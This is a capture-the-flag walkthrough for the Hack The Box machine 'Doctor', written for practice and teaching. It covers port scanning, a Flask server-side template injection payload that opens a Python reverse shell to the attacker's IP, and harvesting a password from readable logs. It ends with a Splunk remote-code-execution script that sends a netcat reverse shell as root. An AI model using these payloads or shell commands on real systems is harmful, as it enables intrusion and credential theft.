Doctor
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.209 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
As we see, only ports 22 (SSH) and 80 (HTTP) and port 8089 are open.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p22,80,8089 10.10.10.209 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
If we enumerate the website with the whatweb tool, we'll see that there is an email with a domain name.
whatweb http://10.10.10.209
Let's add the doctors.htb domain name to the /etc/hosts file, and see if there is Virtual Hosting.
nano /etc/hosts
Let's take a look at the website.
Not much going on. But, if we search for the http://doctors.htb, we'll another website, with a login page, which means that virtual hosting is being used.
Let's create a new user from the Register section. I will be using the username alfa8sa, the email alfa8sa@alfa8sa.com and some random password.
And we get in.
Exploitation
The Wappalyzer extension detected that the web is using Flask.
We could try to do a Server Side Template Injection (STTI) attack.
Let's create a new message by clicking on the New Message button, and put a simple payload, which will multiply 5 by 5, on the Title text field, and another simple payload, which will multiply 6 by 6, on the Content text field.
If we click on the Post button, we'll see the post, but the code won't be interpreted.
But if we take a look at the source code, we'll see a comment saying that there is an archive under beta testing on the /archive directory.
If we take a look at it at http://doctors.htb/archive, we won't see anything. But if see the source code, we'll see that our payload, the one we put in the title, got interpreted.
Time to get a shell. First, let's set a netcat listener on port 4444.
nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
Now, let's make a new message, and put the following payload on the title of the message. The payload is from the PayloadsAllTheThings GitHub repository.
{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.19\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}
If now we access the /archive page, the code will be interpreted, and we'll get a reverse shell as the www user.
http://doctors.htb/archive
Privilege Escalation
First of all, let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command in our local machine:
stty size
And set the proper dimensions in the victim machine:
stty rows 51 columns 236
If we see the groups that the user www belongs to, we'll see that it belongs to the adm group.
As we can read log file, let's go to the /var/log directory.
cd /var/log
And search for the pass word in every log file that we can read.
grep -r pass 2>/dev/null
We'll see a lot of information, but at some point, we should see a POST request to the http://doctor.htb/reset_password URL, with the Guitar123 password.
Let's see which users are in the system.
cat /etc/passwd | grep sh
If we become the shaun user with the password we found before, then we could grab the user flag.
su shaun
If we take a look at the nmap report, we'll see that port 8089 is open, and it is a Splunk httpd server. I searched for exploits of that service, and I found this GitHub repository, which allow us to execute commands remotely (RCE). Let's clone it to our current directory.
git clone https://github.com/cnotin/SplunkWhisperer2
Now, let's go to the PySplunkWhisperer2 directory.
cd SplunkWhisperer2/PySplunkWhisperer2/
Before executing the script, let's set another netcat listener on port 4444.
nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
If we now execute the following command, we should get a reverse shell as the root user, and then all we have to do is reap the harvest and take the root flag.
python PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.19 --username shaun --password Guitar123 --payload "nc.traditional -e /bin/bash 10.10.14.19 4444"
--hostremote host.--lhostlocal host.--usernamevalid username.--passwordvalid password for that username.--payloadcommand which will be executed.
Last updated
Was this helpful?